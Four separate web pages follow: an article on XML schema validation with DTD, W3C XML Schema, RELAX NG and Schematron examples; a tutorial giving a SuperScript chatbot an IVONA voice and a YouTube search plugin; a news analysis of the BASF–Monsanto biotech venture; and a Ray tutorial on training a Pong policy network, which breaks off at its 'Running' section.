There are two kinds of constraints that you can place on an element; you can limit the number and name of its attributes and you can constrain if, where, and how many times it occurs with respect to other elements. An element satisfies the constraints on its attributes if it satisfies the following conditions: every attribute that appears on it is declared, every required attribute is present, and every attribute value satisfies its declared type. Constraining where an element occurs is the role of the content model. Every element that allows sub-element structure has a content model associated with it. This content model describes what elements may occur directly inside it and in what order they may occur. A complex type can therefore be seen as the combination of a content model and a set of attribute constraints. For example, a U.S. postal address might be constrained to contain only street, city, state, and ZIP elements, or a chapter in a book might be constrained to contain exactly one title followed by paragraphs.

Understanding Content Models

Content models are a little bit like regular expressions, although they are nowhere near as flexible. In constructing a content model, you have four tools at your disposal: sequences, choices, repetition, and grouping.

Sequences: A sequence specifies that several elements must occur one after another. For example, a U.S. postal address must contain a city, followed by a state, followed by a ZIP code.

Choices: A choice specifies that any one of a number of elements can occur. For example, a chapter might be allowed to consist of paragraphs, tables, and figures.

Repetition: Repetition allows you to express that an element may be repeated. For example, an address might allow one or more street elements. All of the schema languages allow you to specify that an element may appear exactly once, at most once (optionality), one or more times, and zero or more times. Some languages provide even finer control.

Grouping: Grouping allows you to associate repetition with an entire sequence or choice.
For example, a chapter might allow the choice of paragraph, table, or figure to be repeated any number of times. This effectively allows any combination of paragraphs, tables, and figures to occur. Side-Effects In addition to returning a Boolean result for the question; “Is this document valid?”, schema processors may provide additional information for an application. In the case of W3C XML Schema, a sophisticated Post Schema Validation Infoset is described, while other languages define the results more simply (or not at all). There are two ways of looking at these side effects: On the one hand, they allow the schema processor to provide additional, useful information to applications. This means that applications using schema-validated documents don’t have to recalculate values that the schema processor must have calculated in order to check the validity of the document. Suppose, for example, that your schema identifies the type of an attribute value as a duration of less than 100 years. In order for the schema processor to determine if your document is valid, it will have to: That’s quite a bit of work, and the schema validator has to do it to determine validity, regardless of whatever subsequent processing might be performed. Providing a mechanism for the validator to pass the typed information on to the application frees the application author from the burden of reprocessing the attribute string in order to extract the duration for its purposes. This improves efficiency and avoids one class of application errors. On the other hand, these side effects perform a subtle sort of transformation. They can make the same document appear different depending on whether or not schema processing was performed. In the simple case of DTD validation, for example, a non-validating parser may not provide default attribute values that were specified in the DTD schema. 
extract the attribute value from the document, check that the string is a lexically correct duration, convert it into an actual duration value, and then compare that value against the 100-year limit.
This means that an application such as a stylesheet may behave quite differently depending on exactly what kind of parser was used. Because developers are often not aware that they are actually able to make choices about the kind of processors used, these side-effects can sometimes result in rather confusing errors. Type Information As we just described, one of the most useful features of a schema validator is that it provides datatype information. When looking at a validated document, your application might expect that an attribute declared as an integer would be identified specifically as an integer. There are existing applications, such as XSLT processors, that rely on this extra information for some of their features. XSLT stands for “XSL Transformations,” where XSL itself stands for “Extensible Stylesheet Language.” XSLT is the standard method for transforming XML into HTML or plain text (we’ll be looking at XSLT processors in a future article). In order for the XSLT id() function to find ID values, the document must have been validated with a parser that provides information about which attribute values are in fact of type “ID.” Default Values Another side effect that validators can provide is the ability to set default values for attribute or element content. For example, if an address does not specify a country, the country “US” can be provided automatically. The value of a default attribute is literally provided by the validator. From the point of view of any subsequent processing, the value will be present, and it may not even be possible to tell whether it was included within the original document or provided by the validator. Some validators also provide the ability to specify “fixed values” for attributes or element content. A fixed value is like a default in that it will be provided if it is absent, but if it is present, it must match the fixed value or values specified in the schema. 
It must be noted that supplying default values is not, strictly speaking, part of validation. In fact, in XML 1.0, even non-validating parsers are required to provide default attribute values if they encounter declarations for them. Some schema languages, such as RELAX NG, go so far as to specify defaulting behavior, which is entirely separate from validation. Programming with Schemas Unfortunately, a comprehensive explanation of any one of the common schema languages would require far more space than is available in a single magazine article. So instead, we’ll look at each of them briefly and then attempt to point out some of their distinguishing features. Be sure to take a look at Resources (pg. 33) for more specific information, particularly the report of the Schema Languages Comparison Town Hall Meeting from the XML 2001 conference. Continuing with the postal address example, let’s look at a (simple) schema for validating US postal addresses. Figure One shows what an acceptable element might look like. Figure One: Validating U.S. Postal Addresses <address> <name>John Smith</name> <street>123 Any Street</street> <city>Anytown</city> <state>MA</state> <zip>01004</zip> </address> A postal address might be described this way: an optional name, a post office box or up to three lines of street address, a city, state, and a ZIP code. Because this format will only work for postal addresses located in the United States, we’ll add a fixed attribute to the address that will indicate this. Finally, we’ll allow an optional ID attribute on addresses too, so that we can give addresses unique identifiers for locating them easily in our documents. Choosing a schema language and writing the schema is most of the battle, but before we’re finished, we have to actually use the schema to perform validation. There are lots of ways this can be accomplished, and exactly which mechanism you choose will depend on your needs and your programming environment. 
There are standard XML parsing modules for most common languages, including C/C++, Perl, Python, and Tcl. The examples we’ll explore here are in Java using toolkits from Apache and Sun Microsystems. In the interest of space, we’ll only present the definition of the address elements and small fragments of the source code for our validation examples. You can get the complete text of each of the schemas and the full source code online at. com/downloads/xml_schema.tar.gz. DTD Validation Historically, DTDs (Document Type Definitions) were inherited from SGML, and they are the only form of schema described by the XML 1.0 Recommendation. The principal advantage of DTDs is that they are supported by every validating XML 1.0 parser. They also have well-understood and agreed-upon semantics, and they are compact. Unfortunately, for many modern applications, their advantages are outweighed by their disadvantages. The declaration for an address in a DTD appears in Figure Two.

Figure Two: An Address in XML 1.0 DTD

<!ELEMENT address (name?, (pobox|street+), city, state, zip)>
<!ATTLIST address
    id      ID    #IMPLIED
    country CDATA #FIXED "US"
>

DTDs use a simple string-based syntax to express content models. The comma separator identifies a sequence, and vertical bars identify a choice. Grouping is provided by parentheses. The postfix operators "?", "+", and "*" identify repetition: they indicate optionality, one or more occurrences, and zero or more occurrences, respectively. A name (or group) with no repetition operator must appear exactly once. DTDs provide a few mechanisms for constraining simple types in attribute values, but they provide no mechanisms for such constraints in element content. There is no way to express that the content of the state element must be a valid U.S. state abbreviation or that the ZIP code must contain an integer, let alone an integer in a specific range.
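One way to see how little machinery DTD content models need: they are essentially regular expressions over the sequence of child-element names. The sketch below (plain Python, not a real DTD validator; the helper name is made up for illustration) approximates the Figure Two model with the re module:

```python
import re
import xml.etree.ElementTree as ET

# Approximates the Figure Two content model
#   (name?, (pobox|street+), city, state, zip)
# as a regular expression over the child-element names.
MODEL = re.compile(r"^(name,)?(pobox,|(street,)+)city,state,zip,$")

def address_children_ok(xml_text):
    root = ET.fromstring(xml_text)
    # Serialize the child tags into a comma-delimited string.
    tags = "".join(child.tag + "," for child in root)
    return MODEL.match(tags) is not None

good = ("<address><name>John Smith</name><street>123 Any Street</street>"
        "<city>Anytown</city><state>MA</state><zip>01004</zip></address>")
bad = "<address><city>Anytown</city><zip>01004</zip></address>"
print(address_children_ok(good))  # True
print(address_children_ok(bad))   # False
```

This only checks element order, not attribute types or text content, mirroring the limitation just described.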
(Using integers to constrain the ZIP code is a bit of a hack, but it provides a simple example; in real life, a regular expression or some other mechanism would be preferable.) Attributes are declared separately. They are composed of a name, a type (there are only a handful of types in XML DTDs), and either a default value or a keyword that indicates whether they are optional (#IMPLIED), required (#REQUIRED), or fixed (#FIXED). Validating with DTDs is easy. Any validating XML 1.0 parser will, by definition, perform DTD validation. (For more information on parsing XML, please refer to our October 2001 article or the Resources sidebar.) Figure Three illustrates an example of constructing a validating SAX parser using JAXP.

Figure Three: Validating with XML 1.0 DTDs

SAXParserFactory factory = null;
SAXParser parser = null;
factory = SAXParserFactory.newInstance();
factory.setValidating(true); // Enable validation
parser = factory.newSAXParser();

Any documents that are parsed with this parser will be validated according to the DTD they specify. One unique feature of DTDs is that they must be referenced by the document to be validated. The document type declaration (the line that begins <!DOCTYPE …) at the beginning of an XML document identifies the DTD that applies to that document. If the document type declaration is missing, there is no standard mechanism for selecting an alternate DTD to use for validation. W3C XML Schema Validation The next generation of schema validation from the W3C is XML Schemas. Unlike DTDs, XML Schemas are written using XML elements and attributes instead of a special notation. XML Schemas offer a rich library of built-in datatypes and a type hierarchy that separates type definition from element declaration and allows element types to be derived by restriction or extension.
In other words, you can derive an international address type by extending the definition of some base address type, or you can derive an age datatype from integer by restricting it to values strictly greater than 0 and less than 100. The type definition for an address in a W3C XML Schema appears in Figure Four.

Figure Four: An Address in W3C Schema

<xs:complexType name='Address'>
  <xs:sequence>
    <xs:element ref='name'/>
    <xs:choice>
      <xs:element ref='poBox'/>
      <xs:element ref='street' minOccurs='1' maxOccurs='3'/>
    </xs:choice>
    <xs:element name='city' type='xs:string'/>
    <xs:element name='state' type='StateAbbrev'/>
    <xs:element name='zip' type='ZipCode'/>
  </xs:sequence>
  <xs:attribute name='id' type='xs:ID'/>
  <xs:attribute name='country' type='xs:string' fixed='US'/>
</xs:complexType>

W3C XML Schemas allow for the separation of types from element declarations. In this example, we show the address type (the xs:complexType) and the element declaration (the xs:element) that associates the address element with this type. Separation of type and declaration allows multiple elements to be easily constructed from the same type. The content model is expressed using the elements xs:sequence and xs:choice; these elements provide grouping automatically. Repetition is handled by the minOccurs and maxOccurs attributes. Note that W3C XML Schemas allow for arbitrary repetition counts. Many of the elements and attributes here are declared in terms of built-in datatypes, but state and zip are defined in terms of user-defined types. This allows the schema to constrain their values to the U.S. states and reasonable ZIP codes. (The definitions of the user-defined types StateAbbrev and ZipCode are not shown here, but they are fully defined in the address schema that is available for download.) The xs:attribute element declares attributes.
They have a name, a type (which may be drawn from the full palette of built-in XML Schema datatypes), and may be specified as being either optional, required, or fixed. Support for W3C XML Schemas is starting to show up in parser libraries. Recent releases of the popular Xerces parser from Apache, for example, now include W3C XML Schema validation. The example in Figure Five is based on the Xerces-J 1.4.3 APIs. (For more information on Xerces, check out the Apache Project’s XML pages. You’ll find the URL in Resources.) In Figure Five, we begin by establishing a SAX Parser factory, just as we did for DTD validation. Note, however, that we explicitly enable namespace awareness; this is necessary for W3C XML Schema validation with Xerces. Because Xerces also enables schema validation through features on the XMLReader implementation, we must set this after getting the XMLReader.

Figure Five: Validating with W3C XML Schemas

SAXParserFactory factory = null;
SAXParser parser = null;
factory = SAXParserFactory.newInstance();
factory.setValidating(true);     // Enable validation
factory.setNamespaceAware(true); // Required for schema validation
parser = factory.newSAXParser();
XMLReader reader = parser.getXMLReader();
reader.setFeature(
    "http://apache.org/xml/features/validation/schema", true);
reader.setProperty(
    "http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation",
    schema);

Normally, the document will use the schema location hints to identify which schema should be used. However, W3C XML Schemas allow us to force the document to be processed with an arbitrary schema regardless of any hints that might be in the document. The “no namespace” schema is selected because this address won’t be located in any namespace. If you’re using namespaces, you want to make sure that you set the http://apache.org/xml/properties/schema/external-schemaLocation property or properties (if you have more than one namespace) appropriately. For more information on XML Namespaces, please refer again to our July 2001 article on XML. OASIS RELAX NG Schema Validation The RELAX NG specification is the work of the OASIS RELAX NG Technical Committee. OASIS, the Organization for the Advancement of Structured Information Standards, is an international, not-for-profit consortium that designs and develops industry standard specifications for interoperability based on XML.
This work represents the unification of two other schema languages, TREX and RELAX. RELAX NG is built on a strong theoretical foundation and provides a number of features not available elsewhere, including co-constraints and the ability to use not only the W3C XML Schema datatypes, but also alternate datatype libraries. RELAX NG offers little support for validation side-effects. In fact, ID identification is provided by an ancillary specification; features such as fixed attribute values and fixed or defaulted element content are not provided. The declarations for an address in a RELAX NG schema appear in Figure Six.

Figure Six: An Address in RELAX NG

<element name="address">
  <optional>
    <attribute name="country" a:defaultValue="US">
      <choice>
        <value>US</value>
      </choice>
    </attribute>
  </optional>
  <optional>
    <attribute name="id">
      <data type="ID"/>
    </attribute>
  </optional>
  <group>
    <optional>
      <ref name="Name"/>
    </optional>
    <choice>
      <ref name="POBox"/>
      <oneOrMore>
        <ref name="Street"/>
      </oneOrMore>
    </choice>
  </group>
  <element name="city"><text/></element>
  <element name="state">
    <ref name="StateAbbrev"/>
  </element>
  <element name="zip">
    <ref name="ZipCode"/>
  </element>
</element>

Within the model for RELAX NG Schemas, elements form a sequence unless they are contained in a choice. A group element allows for grouping. Additionally, there are elements that allow the schema to express repetition: oneOrMore, optional, and zeroOrMore. Elements can be declared “in place” by using element. Alternatively, you can use ref to refer to declarations made elsewhere. RELAX NG Schemas can define components that may be reused. Here, StateAbbrev and ZipCode components constrain the content of state and zip, respectively. Attribute declarations and element declarations in RELAX NG are treated uniformly. The same elements used to declare element content are used to declare attribute content and optionality.
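To make the semantics of these pattern elements concrete, here is a toy Python sketch (an illustration of the idea only, not RELAX NG itself and not how any real validator is written) that models group, choice, optional, and oneOrMore as combinators over the sequence of child-element names:

```python
# Each pattern takes a tuple of remaining child-element names and
# returns the set of possible remainders after matching.
def match_name(tag):
    return lambda seq: {seq[1:]} if seq and seq[0] == tag else set()

def group(*ps):
    # Sequence: feed each pattern the remainders left by the previous one.
    def m(seq):
        states = {seq}
        for p in ps:
            states = {rest for s in states for rest in p(s)}
        return states
    return m

def choice(*ps):
    return lambda seq: {r for p in ps for r in p(seq)}

def optional(p):
    return lambda seq: {seq} | p(seq)

def one_or_more(p):
    # Match p at least once, then keep matching while it succeeds.
    def m(seq):
        out, frontier = set(), p(seq)
        while frontier - out:
            out |= frontier
            frontier = {r for s in frontier for r in p(s)}
        return out
    return m

# The content portion of the Figure Six pattern.
address = group(
    optional(match_name("name")),
    choice(match_name("pobox"), one_or_more(match_name("street"))),
    match_name("city"), match_name("state"), match_name("zip"),
)

def valid(children):
    # The pattern matches if some remainder is the empty sequence.
    return () in address(tuple(children))

print(valid(["name", "street", "street", "city", "state", "zip"]))  # True
print(valid(["pobox", "street", "city", "state", "zip"]))           # False
```

Real RELAX NG validators use far more efficient algorithms (such as derivative-based matching), but the pattern algebra is the same.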
The ability to specify default values for attributes is provided by a separate annotation specification, shown in use here with the a:defaultValue annotation. Because there is no direct equivalent of fixed values in RELAX NG, this schema achieves that behavior by specifying that the allowed content of the country attribute is a choice with a single possible value. Figure Seven shows an example of validating with RELAX NG. In this case, Sun’s Multi-Schema XML Validator (MSV) is being used. MSV has a slightly different factory setup than the SAX Parser.

Figure Seven: Validating with RELAX NG

String schemaURI = "";
VerifierFactory factory = VerifierFactory.newInstance(schemaURI);
Verifier verifier = factory.newVerifier(schema);
if (verifier.verify(xmlfile)) {
    System.out.println("Document is valid, full speed ahead!");
} else {
    System.out.println("Document is not valid according to " + schema);
}

As its name implies, MSV can validate using several different schema languages. The schemaURI is used to determine which type of verifier to construct. In the full source for this program, you’ll see that there’s a command-line switch to select either RELAX NG or W3C XML Schema validation. After constructing a factory for the validator (or verifier) we want, we must then build a verifier for the particular schema that we’re using. The schema variable contains the URI of the file containing the schema we wish to use for validation. Schematron Validation Schematron, developed principally by Rick Jelliffe at the Academia Sinica Computing Center, takes an entirely different approach to validation.
Unlike the other schemas we have looked at, Schematron is not based on the declaration of a grammar that must be matched, nor does it have a content model like the other schema languages. Instead, it relies on the validation of “tree patterns.” As a result, a Schematron system does not have the ability to provide validation side-effects. This technique provides tremendous new power; you could, for example, design a Schematron schema that required every city name to be two words or have an odd number of letters. In short, you can assert that any expression be true in any given context. Using Schematron is sometimes a bit awkward, but there are many constraints that can’t be expressed easily, or even at all, in a grammar-based schema. One area of growing interest is the combination of Schematron with other validation strategies, effectively combining the best of both worlds. The declarations for an address in a Schematron schema are in Figure Eight.

Figure Eight: An Address in Schematron

<pattern name="Valid Address">
  <rule context="address">
    <assert test="count(name) &lt; 2">Must have at most one name</assert>
    <assert test="count(pobox) != 0 or count(street) != 0">Must have pobox or street</assert>
    <assert test="count(pobox) = 0 or count(street) = 0">Must have only one of pobox or street</assert>
    <assert test="count(pobox) &lt; 2">Must have at most one pobox</assert>
    <assert test="count(street) &lt;= 3">May have at most three lines of street</assert>
    <assert test="count(city)=1">Must have exactly one city</assert>
    <assert test="count(state)=1">Must have exactly one state</assert>
    <assert test="count(zip)=1">Must have exactly one zip</assert>
    <assert test="not(@country) or @country='US'">Country must be US</assert>
  </rule>
</pattern>

In this schema, we express our constraints literally using XPath expressions. XPath, the XML Path Language, will be described in greater detail in our future article on XSL Transformations.
In the example above, we test for an optional name element by asserting that the number of name elements is less than two (i.e., zero or one, since the number of elements that are present cannot possibly be negative). Attribute and element constraints are handled simply by using the appropriate expressions. Note that these XPath expressions occur within the context of an XML document, so the markup characters that are significant to XML must be escaped. That’s why we use “&lt;” instead of “<” in our expressions. Schematron is very different from the other schema languages. Instead of being a grammar-based language like the others, it’s a rule-based language. It turns out that XSLT, which we’ve mentioned before, is a convenient language for expressing these rules. If you aren’t at all familiar with XSLT, that’s perfectly okay. You can use Schematron without a complete understanding of XSL Transformations; its validation tools can write all the XSLT stylesheets you’ll need. The first step in performing Schematron validation is to convert your Schematron schema into an XSLT stylesheet (using an XSLT stylesheet provided in the Schematron implementation). Figure Nine shows a small part of the Schematron XSLT stylesheet for addresses. Only the tests for the first two assertions are shown.

Figure Nine: Validating with Schematron

<axsl:template match="address" priority="4000" mode="M1">
  <axsl:choose>
    <axsl:when test="count(name) &lt; 2"/>
    <axsl:otherwise>In pattern count(name) &lt; 2: Must have one name</axsl:otherwise>
  </axsl:choose>
  <axsl:choose>
    <axsl:when test="count(pobox) != 0 or count(street) != 0"/>
    <axsl:otherwise>In pattern count(pobox) != 0 or count(street) != 0: Must have pobox or street</axsl:otherwise>
  </axsl:choose>

The next step is to process your source document with the XSLT stylesheet derived from your Schematron schema. If there are assertions that fail, the stylesheet will produce messages to that effect.
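The rule-based flavor of Schematron can be imitated in a few lines outside the XSLT toolchain. The following Python sketch (hypothetical helper names, and only a rough analogue of a handful of the Figure Eight assertions) treats each assertion as a predicate plus a failure message:

```python
import xml.etree.ElementTree as ET

# Each entry pairs a predicate over the address element with the
# message to report when the assertion fails, echoing Figure Eight.
ASSERTIONS = [
    (lambda a: len(a.findall("name")) < 2, "Must have at most one name"),
    (lambda a: a.find("pobox") is not None or a.find("street") is not None,
     "Must have pobox or street"),
    (lambda a: len(a.findall("city")) == 1, "Must have exactly one city"),
    (lambda a: a.get("country") in (None, "US"), "Country must be US"),
]

def check_address(xml_text):
    addr = ET.fromstring(xml_text)
    # Collect the messages of every assertion that does not hold.
    return [msg for ok, msg in ASSERTIONS if not ok(addr)]

doc = "<address country='CA'><city>Anytown</city></address>"
print(check_address(doc))
# ['Must have pobox or street', 'Country must be US']
```

Real Schematron goes much further (full XPath contexts, patterns, phases), but the check-and-report shape is the same.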
Using a Schematron stylesheet directly in your application would then require processing the documents with an XSLT Processor (such as the Apache Project’s Xalan) and examining the results. Choosing a Tool In this article, we’ve examined the role and benefits of validation as well as a number of specific validation tools that you can use in your various XML projects. Which specific tool you elect to use will depend on many factors, but hopefully you’ve seen that validation of some form is always a good idea. Resources
http://www.linux-mag.com/id/971/
In the previous post we looked at getting your new bot off the ground with the SuperScript package. Today, we'll take this a step further and write your own personal assistant to find music videos, complete with its own voice using IVONA's text-to-speech platform.

Giving your bot a voice

To get started with IVONA, visit here and go to Speech Cloud > Sign Up. After a quick sign-up process, you'll be pointed to your dashboard, where you'll be able to get the API key needed to use their services. Go ahead and do so, and ensure you download the key file, as we'll need it later. We'll need to add a couple more packages to your SuperScript bot to integrate IVONA into it, so run the following:

npm install --save ivona-node
npm install --save play-sound

ivona-node is a library for easily interfacing with the IVONA API without having to set things like custom headers yourself, while play-sound will let you play sound directly from your terminal, so you can hear what your bot says without having to locate the mp3 file and play it yourself! Now we need to write some code to get these two things working together. Open up src/server.js in your SuperScript directory, and at the top, add:

import Ivona from 'ivona-node';
import Player from 'play-sound';
import fs from 'fs';

We'll need fs to be able to write the voice files to our system. Now, find your IVONA access and secret keys, and set up a new IVONA instance by adding the following:

const ivona = new Ivona({
  accessKey: 'YOUR_ACCESS_KEY',
  secretKey: 'YOUR_SECRET_KEY',
});

We also need to create an instance of the player:

const player = Player();

Great! We can double-check that we can access the IVONA servers by asking for a full list of voices that IVONA provides.

ivona.listVoices()
  .on('complete', (voices) => {
    console.log(voices);
  });

These are available to sample on the IVONA home page, so if you haven't already, go and check it out. And find one you like! Now it's time for the magic to happen.
Inside the bot.reply callback, we need to ask IVONA to turn our bot response into speech before outputting it in our terminal. We can do that in just a few lines:

bot.reply(..., (err, reply) => {
  // ... Other code to output text to the terminal ...
  const stream = fs.createWriteStream('text.mp3');
  ivona.createVoice(reply.string, {
    body: {
      voice: {
        name: 'Justin',
        language: 'en-US',
        gender: 'Male',
      },
    },
  }).pipe(stream);
  stream.on('finish', () => {
    player.play('text.mp3', (err) => {
      if (err) {
        console.error(err);
      }
    });
  });
});

Run your bot again by running npm run start, and watch the magic unfurl as your bot speaks to you!

Getting your bot to do your bidding

Now that your bot has a human-like voice, it's time to get it to do something useful for you. After all, you are its master. We're going to write a simple script to find music videos for you. So let's open up chat/main.ss and add an additional trigger:

+ find a music video for (*) by (*)
- Okay, here's your music video for <cap1> by <cap2>. ^findMusicVideo(<cap1>, <cap2>)

Here, whenever we ask the bot for a music video, we just go off to our function findMusicVideo that finds a relevant video on YouTube. We'll write that SuperScript plugin now. First, we'll need to install the request library to make HTTP requests to YouTube.

npm install --save request

You'll also need to get a Google API key to search YouTube and get back some results in JSON form. To do this, you can go to here and follow the instructions to get a new key for the 'YouTube Data API'.
Then, inside plugins/musicVideo.js, we can write:

import request from 'request';

const YOUTUBE_API_BASE = '';
const GOOGLE_API_KEY = 'YOUR_KEY_HERE';

const findMusicVideo = function findMusicVideo(song, artist, callback) {
  request({
    url: YOUTUBE_API_BASE,
    qs: {
      part: 'snippet',
      key: GOOGLE_API_KEY,
      q: `${song} ${artist}`,
    },
  }, (error, response, body) => {
    if (!error && response.statusCode === 200) {
      try {
        const parsedJSON = JSON.parse(body);
        if (parsedJSON.items[0]) {
          return callback(`${parsedJSON.items[0].id.videoId}`);
        }
      } catch (err) {
        console.error(err);
      }
      return callback('');
    }
    return callback('');
  });
};

All we're doing here is making a request to the YouTube API for the relevant song and artist. We then take the first one that YouTube found, and stick it in a nice link to give back to the user. Now, parse and run your bot again, and you'll see that not only does your bot talk to you with a voice, but now you can ask it to find a YouTube video for you. About the author Ben is currently the technical director at To Play For, creating games, interactive stories and narratives using artificial intelligence. Follow him at @ToPlayFor.
https://www.packtpub.com/books/content/adding-life-your-chatbot
21 March 2007 17:27 [Source: ICIS news] LONDON (ICIS news)--BASF is beginning to unleash its considerable potential in biotechnology. The company has developed a range of techniques, including metabolic profiling, or metabolomics, and high throughput screening in its Plant Science business that is obviously attractive. The venture announced on Wednesday with gene science leader Monsanto reflects this. Pumping a cool $1.5bn (€1.1bn) into yield and stress tolerance traits for corn, soybeans, cotton and canola – or oil seed rape – jointly with Monsanto signals a great deal. BASF is building on its platform of innovation to look harder at raw material change – how alternative raw materials might be used to make chemicals and biotechnology applied to nutrition, health and more efficient agriculture. Its metabolomics research particularly delves into which genes express which chemicals in plant cellular activity. The chemicals giant has applied expertise in analytics, robotics and complex laboratory information systems to plant science to make a difference. It has taken a different route to most players in the agricultural biotechnology business but clearly now needs a partner to deliver products that will help grow more food and plant-based feedstock more effectively. Yield and stress are the focus of the deal with Monsanto – a 50:50 research venture through which both companies expect to accelerate product pipeline development. Monsanto has been keen to tap into a new approach in its core business, principally developed by the BASF company Metanomics. It sees significant potential to accelerate product throughput giving farmers access to new traits. BASF has described the plant biotechnology systems it has developed since it set up a plant science business in 1998 as a Google dedicated to genetics. The systems can rapidly sort genes for further R&D work, with Metanomics delving into the workings of individual plant ‘factories’.
The search for enhanced yield and stress tolerant traits is one of the most important in agriculture. More meat is being consumed in … Yield is the Holy Grail of agricultural research, and the partners in this deal say they expect to produce a family of products over the next decade delivering yield increases of more than 20%. This venture is not simply about research, Monsanto and BASF stress. Monsanto expects the net present value of its yield and stress product platform to double through the link-up. BASF will benefit from more effectively monetising its plant science research and speeding the delivery of products to market from its early stage research. New products from the venture will be sold through the Monsanto network with the proceeds split 60:40. Monsanto is clearly delighted with the deal. “We’ve just connected a fire hose to our product pipeline,” one senior executive said on Thursday. BASF is on the way to delivering considerably more through its network of chemical and biotechnology expertise.
http://www.icis.com/Articles/2007/03/21/9015244/insight-basf-finds-smart-route-for-plant-science.html
Learning to Play Pong

In this example, we’ll train a very simple neural network to play Pong using the OpenAI Gym. At a high level, we will use multiple Ray actors to obtain simulation rollouts and calculate gradients simultaneously. We will then centralize these gradients and update the neural network. The updated neural network will then be passed back to each Ray actor for more gradient calculation. This application is adapted, with minimal modifications, from Andrej Karpathy’s source code (see the accompanying blog post). To run the application, first install some dependencies.

pip install gym[atari]

At the moment, on a large machine with 64 physical cores, computing an update with a batch of size 1 takes about 1 second, and a batch of size 10 takes about 2.5 seconds. A batch of size 60 takes about 3 seconds. On a cluster with 11 nodes, each with 18 physical cores, a batch of size 300 takes about 10 seconds. If the numbers you see differ from these by much, take a look at the Troubleshooting section at the bottom of this page and consider submitting an issue. Note that these times depend on how long the rollouts take, which in turn depends on how well the policy is doing. For example, a really bad policy will lose very quickly. As the policy learns, we should expect these numbers to increase.

import numpy as np
import os
import ray
import time
import gym

Hyperparameters

Here we’ll define a couple of the hyperparameters that are used.

H = 200  # The number of hidden layer neurons.
gamma = 0.99  # The discount factor for reward.
decay_rate = 0.99  # The decay factor for RMSProp leaky sum of grad^2.
D = 80 * 80  # The input dimensionality: 80x80 grid.
learning_rate = 1e-4  # Magnitude of the update.

Helper Functions

We first define a few helper functions:

1. Preprocessing: The preprocess function will preprocess the original 210x160x3 uint8 frame into a one-dimensional 6400 float vector.
2.
Reward Processing: The process_rewards function will calculate a discounted reward. This formula states that the “value” of a sampled action is the weighted sum of all rewards afterwards, but later rewards are exponentially less important.
3. Rollout: The rollout function plays an entire game of Pong (until either the computer or the RL agent loses).

def preprocess(img):
    # Crop the image.
    img = img[35:195]
    # Downsample by factor of 2.
    img = img[::2, ::2, 0]
    # Erase background (background type 1).
    img[img == 144] = 0
    # Erase background (background type 2).
    img[img == 109] = 0
    # Set everything else (paddles, ball) to 1.
    img[img != 0] = 1
    return img.astype(np.float).ravel()


def process_rewards(r):
    """Compute discounted reward from a vector of rewards."""
    discounted_r = np.zeros_like(r)
    running_add = 0
    for t in reversed(range(0, r.size)):
        # Reset the sum, since this was a game boundary (pong specific!).
        if r[t] != 0:
            running_add = 0
        running_add = running_add * gamma + r[t]
        discounted_r[t] = running_add
    return discounted_r


def rollout(model, env):
    """Evaluates env and model until the env returns "Done".

    Returns:
        xs: A list of observations
        hs: A list of model hidden states per observation
        dlogps: A list of gradients
        drs: A list of rewards.
    """
    # Reset the game.
    observation = env.reset()
    # Note that prev_x is used in computing the difference frame.
    prev_x = None
    xs, hs, dlogps, drs = [], [], [], []
    done = False
    while not done:
        cur_x = preprocess(observation)
        x = cur_x - prev_x if prev_x is not None else np.zeros(D)
        prev_x = cur_x
        aprob, h = model.policy_forward(x)
        # Sample an action.
        action = 2 if np.random.uniform() < aprob else 3
        # The observation.
        xs.append(x)
        # The hidden state.
        hs.append(h)
        y = 1 if action == 2 else 0  # A "fake label".
        # The gradient that encourages the action that was taken to be
        # taken (see the policy gradient notes if confused).
        dlogps.append(y - aprob)
        observation, reward, done, info = env.step(action)
        # Record reward (has to be done after we call step() to get reward
        # for previous action).
        drs.append(reward)
    return xs, hs, dlogps, drs

Neural Network

Here, a neural network is used to define a “policy” for playing Pong (that is, a function that chooses an action given a state). To implement a neural network in NumPy, we need to provide helper functions for calculating updates and computing the output of the neural network given an input, which in our case is an observation.

class Model(object):
    """This class holds the neural network weights."""

    def __init__(self):
        # "Xavier" initialization.
        self.weights = {}
        self.weights["W1"] = np.random.randn(H, D) / np.sqrt(D)
        self.weights["W2"] = np.random.randn(H) / np.sqrt(H)

    def policy_forward(self, x):
        h = np.dot(self.weights["W1"], x)
        h[h < 0] = 0  # ReLU nonlinearity.
        logp = np.dot(self.weights["W2"], h)
        # Softmax
        p = 1.0 / (1.0 + np.exp(-logp))
        # Return probability of taking action 2, and hidden state.
        return p, h

    def policy_backward(self, eph, epx, epdlogp):
        """Backward pass to calculate gradients.

        Arguments:
            eph: Array of intermediate hidden states.
            epx: Array of experiences (observations).
            epdlogp: Array of logps (output of last layer before softmax).
        """
        dW2 = np.dot(eph.T, epdlogp).ravel()
        dh = np.outer(epdlogp, self.weights["W2"])
        # Backprop relu.
        dh[eph <= 0] = 0
        dW1 = np.dot(dh.T, epx)
        return {"W1": dW1, "W2": dW2}

    def update(self, grad_buffer, rmsprop_cache, lr, decay):
        """Applies the gradients to the model parameters with RMSProp."""
        for k, v in self.weights.items():
            g = grad_buffer[k]
            rmsprop_cache[k] = (decay * rmsprop_cache[k] + (1 - decay) * g**2)
            self.weights[k] += lr * g / (np.sqrt(rmsprop_cache[k]) + 1e-5)


def zero_grads(grad_buffer):
    """Reset the batch gradient buffer."""
    for k, v in grad_buffer.items():
        grad_buffer[k] = np.zeros_like(v)

Parallelizing Gradients

We define an actor, which is responsible for taking a model and an env and performing a rollout + computing a gradient update.

ray.init()


@ray.remote
class RolloutWorker(object):
    def __init__(self):
        # Tell numpy to only use one core. If we don't do this, each actor may
        # try to use all of the cores and the resulting contention may result
        # in no speedup over the serial version. Note that if numpy is using
        # OpenBLAS, then you need to set OPENBLAS_NUM_THREADS=1, and you
        # probably need to do it from the command line (so it happens before
        # numpy is imported).
        os.environ["MKL_NUM_THREADS"] = "1"
        self.env = gym.make("Pong-v0")

    def compute_gradient(self, model):
        # Compute a simulation episode.
        xs, hs, dlogps, drs = rollout(model, self.env)
        reward_sum = sum(drs)
        # Vectorize the arrays.
        epx = np.vstack(xs)
        eph = np.vstack(hs)
        epdlogp = np.vstack(dlogps)
        epr = np.vstack(drs)
        # Compute the discounted reward backward through time.
        discounted_epr = process_rewards(epr)
        # Standardize the rewards to be unit normal (helps control the gradient
        # estimator variance).
        discounted_epr -= np.mean(discounted_epr)
        discounted_epr /= np.std(discounted_epr)
        # Modulate the gradient with advantage (the policy gradient magic
        # happens right here).
        epdlogp *= discounted_epr
        return model.policy_backward(eph, epx, epdlogp), reward_sum

Running

